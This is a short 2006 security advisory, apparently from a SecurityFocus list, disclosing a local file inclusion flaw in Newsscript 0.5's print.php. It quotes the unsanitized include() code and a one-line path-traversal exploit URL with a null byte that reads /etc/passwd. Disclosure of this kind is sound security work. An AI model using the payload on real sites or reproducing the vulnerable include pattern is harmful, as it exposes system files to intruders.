Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability Sep 12 2006 03:06AM
daftrix gmail com
# Subject:

--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "

# Vulnerable version:

--- "Newsscript version 0.5"

# Vendor URL:

--- Emaill - mail (at) webmaster-journal (dot) com [email concealed]

--- Website - http://webmaster-journal.com

# Available in:

---http://www.comscripts.com/scripts/php.wm-news.203.html

# Vulnerability:

--- Vulnerable code in print/print.php

--- $ide var is not sanitized and can be used to include files from local resources

--- 1 <html>

--- 2 <head>

--- 3 <?

--- 4 $file_name = "../".$ide.".txt";

--- 5 ?>

---

---

--- 27 include($file_name);

# Exploit:

--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00

# Discovered By:

--- Daftrix[at]Gmail.com

--- Daftrix Security Investigations

--- http://www.daftrix.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus